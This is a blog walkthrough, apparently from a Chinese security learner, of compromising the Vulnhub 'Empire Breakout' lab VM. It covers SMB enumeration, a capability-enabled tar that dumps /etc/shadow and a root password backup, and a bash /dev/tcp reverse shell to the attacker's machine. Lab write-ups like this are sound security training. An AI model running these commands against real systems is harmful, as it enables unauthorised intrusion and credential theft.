Vulnhub Linux Web Privilege Escalation

Empire Breakout

Posted by axlfpe on 2025-05-21
Estimated Reading Time 12 Minutes
Words 2.3k In Total
Viewed Times

Empire Breakout

靶机地址:https://www.vulnhub.com/entry/hack-me-please-1,731/
攻击机ip:192.168.108.50
靶机ip: 192.168.108.131

一,信息收集

1
Kal ddddx ~ ❯ rustscan -a 192.168.108.131

图片.png

发现开了三个端口

图片.png

先去正常访问一下

图片.png

发现是apache默认页面,看一下源码

图片.png

1
2
3
4
5
6
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

翻到最后面发现一段加密信息,这里用的是Brainfuck 语言编写的代码片段,像这钟伪装加密很好破解,破解完是

1
.2uqPEfj3D<P'a-3

扫描一下端口,没发现什么东西,139和455则为Windows 文件共享(SMB 协议)端口,尝试访问10000和20000

图片.png

图片.png

发现是两个不同的登录系统,一个是Webmin一个是用户的,尝试万能密码和弱密码,查看页面源码,无果

结合之前拿到了用户的password,接下来的任务应该就是找用户名了

1
2
3
4
5
6
7
8
9
Kal ddddx ~ ❯ smbclient -L \\192.168.108.131 -N                                                             at 20:02:14
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.108.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

尝试扫描发现报错,查了发现是kali默认使用smb1,而且大部分都目标服务器都默认禁用了 SMB1(因为存在安全问题,例如永恒之蓝)
解决方案:使用 smbclient 加上 --option 强制使用较新的协议:

1
2
3
4
5
6
7
Kal ddddx ~ ❯ smbclient -L //192.168.108.131 -N --option='client min protocol=SMB2' --option='client max protocol=SMB3'

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
SMB1 disabled -- no workgroup available

发现两个共享文件夹,尝试枚举,首先print

1
2
Kal ddddx ~ ❯ smbclient //192.168.108.131/print$ -N --option='client min protocol=SMB2' --option='client max protocol=SMB3'
tree connect failed: NT_STATUS_ACCESS_DENIED

发现匿名**(-N)**无法访问 print$ 共享目录也就是说目标 Samba 服务开启了访问控制
尝试访问ipc

1
2
3
Kal ddddx ~ ❯ smbclient //192.168.108.131/IPC$ -N --option='client min protocol=SMB2' --option='client max protocol=SMB3'
Try "help" to get a list of possible commands.
smb: \>

发现成功连接接下来尝试利用 IPC$ 进行枚举和信息收集,可以使用 rpcclient 连接 IPC$ 来枚举信息,也可以用enum4linux-ng 自动化信息收集,这里选择用enum4linux-ng

它会自动尝试 Null Session 登录,并收集:

  • SMB 版本
  • 主机名/工作组/域名
  • 用户列表
  • 共享资源
  • 操作系统信息

?这里用enum4linux-ng没出来,用enum4linux出来了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
Kal ddddx ~ ❯ enum4linux 192.168.108.131                                                                    at 20:23:08
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 20 20:27:18 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.108.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==========================( Enumerating Workgroup/Domain on 192.168.108.131 )==========================

[+] Got domain/workgroup name: WORKGROUP

 ==============================( Nbtstat Information for 192.168.108.131 )==============================

Looking up status of 192.168.108.131
        BREAKOUT        <00> -         B <ACTIVE>  Workstation Service
        BREAKOUT        <03> -         B <ACTIVE>  Messenger Service
        BREAKOUT        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.108.131 )==================================

[+] Server 192.168.108.131 allows sessions using username '', password ''

 ===============================( Getting domain SID for 192.168.108.131 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

 =================================( OS information on 192.168.108.131 )=================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.108.131 from srvinfo:
        BREAKOUT       Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ======================================( Users on 192.168.108.131 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.108.131 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.108.131 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.108.131

//192.168.108.131/print$        Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.108.131/IPC$  Mapping: N/A Listing: N/A Writing: N/A

 ==========================( Password Policy Information for 192.168.108.131 )==========================

[+] Attaching to 192.168.108.131 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] BREAKOUT
        [+] Builtin

[+] Password Info for Domain: BREAKOUT

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 =====================================( Groups on 192.168.108.131 )=====================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 =================( Users on 192.168.108.131 via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\cyber (Local User)

[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''

S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)

 ==============================( Getting printer info for 192.168.108.131 )==============================

No printers returned.

enum4linux complete on Tue May 20 20:27:32 2025

总结一下,

用户枚举成功(RID 循环)

  • cyber(Unix 本地用户,UID=1000)
  • nobody(Samba默认用户)
  • None(组名,看起来像是默认/无分组)

这意味着系统中至少存在一个有效本地用户 cyber

有用户有密码,登录20000端口

图片.png

成功进入,一番搜寻之后拿到了第一个flags

图片.png

1
2
3
4
5
[cyber@breakout ~]$ ls
tar
user.txt
[cyber@breakout ~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

继续提权,先查看第二个文件,发现隶属于root文件下,也就是说,在一个普通用户的主目录中有一个 由 root 拥有、可执行的 tar 程序副本

图片.png

发现不是suid程序,那就换个思路,查看一下文件能力

图片.png

这个 tar 程序启用了 Linux 的 capability(能力位) cap_dac_read_search,并设置为 ep(effective + permitted)
这是 Linux 的一种特权能力,允许进程绕过文件系统的读/执行权限检查,相当于让它能读取/搜索本不属于它的目录或文件内容

尝试将etc下面的shadow打包出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[cyber@breakout ~]$ ./tar -cf shadow.tar /etc/shadow
./tar: Removing leading `/' from member names
[cyber@breakout ~]$ tar
tar
tarcat
[cyber@breakout ~]$ tar -xf shadow.tar
[cyber@breakout ~]$ cat etc/shadow
root:$y$j9T$M3BDdkxYOlVM6ECoqwUFs.$Wyz40CNLlZCFN6Xltv9AAZAJY5S3aDvLXp0tmJKlk6A:18919:0:99999:7:::
daemon:*:18919:0:99999:7:::
bin:*:18919:0:99999:7:::
sys:*:18919:0:99999:7:::
sync:*:18919:0:99999:7:::
games:*:18919:0:99999:7:::
man:*:18919:0:99999:7:::
lp:*:18919:0:99999:7:::
mail:*:18919:0:99999:7:::
news:*:18919:0:99999:7:::
uucp:*:18919:0:99999:7:::
proxy:*:18919:0:99999:7:::
www-data:*:18919:0:99999:7:::
backup:*:18919:0:99999:7:::
list:*:18919:0:99999:7:::
irc:*:18919:0:99999:7:::
gnats:*:18919:0:99999:7:::
nobody:*:18919:0:99999:7:::
_apt:*:18919:0:99999:7:::
systemd-timesync:*:18919:0:99999:7:::
systemd-network:*:18919:0:99999:7:::
systemd-resolve:*:18919:0:99999:7:::
messagebus:*:18919:0:99999:7:::
cyber:$y$j9T$x6sDj5S/H0RH4IGhi0c6x0$mIPyCIactTA3/gxTaI7zctfCt2.EOGXTOW4X9efAVW4:18919:0:99999:7:::
systemd-coredump:!*:18919::::::

这是 Yescrypt 格式的密码哈希(以 $y$ 开头),是现代 Linux(如 Shadow >= v4.8)默认采用的一种更安全的哈希方式

yescrypt的加密hashcat尚不能稳定破解,这里使用john,发现也爆不出来

看教程说是在/var/backups下有一个密码的备份文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[cyber@breakout ~]$ cd /var/backups/
[cyber@breakout backups]$ ls -al
total 480
drwxr-xr-x  2 root root   4096 May 20 06:25 .
drwxr-xr-x 14 root root   4096 Oct 19  2021 ..
-rw-r--r--  1 root root  40960 May 20 06:25 alternatives.tar.0
-rw-r--r--  1 root root  12732 Oct 19  2021 apt.extended_states.0
-rw-r--r--  1 root root      0 May 20 06:25 dpkg.arch.0
-rw-r--r--  1 root root    186 Oct 19  2021 dpkg.diversions.0
-rw-r--r--  1 root root    135 Oct 19  2021 dpkg.statoverride.0
-rw-r--r--  1 root root 413488 Oct 19  2021 dpkg.status.0
-rw-------  1 root root     17 Oct 20  2021 .old_pass.bak
[cyber@breakout backups]$ cd ~
[cyber@breakout ~]$ ./tar -cvf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ tar -xvf pass.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

拿到root密码尝试登录,发现一到输入密码就打断,无法直接登录

1
2
3
4
5
6
7
8
[cyber@breakout ~]$ su
Password: su: Authentication failure
[cyber@breakout ~]$ su
Password: su: Authentication failure
[cyber@breakout ~]$ su
Password: su: Authentication failure
[cyber@breakout ~]$ su
Password: su: Authentication failur

反弹一个shell到kali上,再尝试登录,成功拿到最后一个flags

1
[cyber@breakout ~]$ bash -i >& /dev/tcp/192.168.108.50/2000 0>&1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Kal ddddx ~ ❯ pwncat-cs -l -p 2001                                                                          at 14:42:57
[15:01:00] Welcome to pwncat 🐈!                                                                         __main__.py:164
[15:01:02] received connection from 192.168.108.131:56124                                                     bind.py:84
[15:01:02] 0.0.0.0:2001: normalizing shell path                                                           manager.py:957
           192.168.108.131:56124: registered new host w/ db                                               manager.py:957
(local) pwncat$
(remote) cyber@breakout:/home/cyber$ su
Password:
root@breakout:/home/cyber# ls
12  etc  pass.tar  shadow.tar  tar  user.txt  var
root@breakout:/home/cyber# cd ~
root@breakout:~# ls
rOOt.txt
root@breakout:~# cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity
root@breakout:~#

如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !

特色标签
Vulnhub Linux Web Privilege Escalation
链友
ESC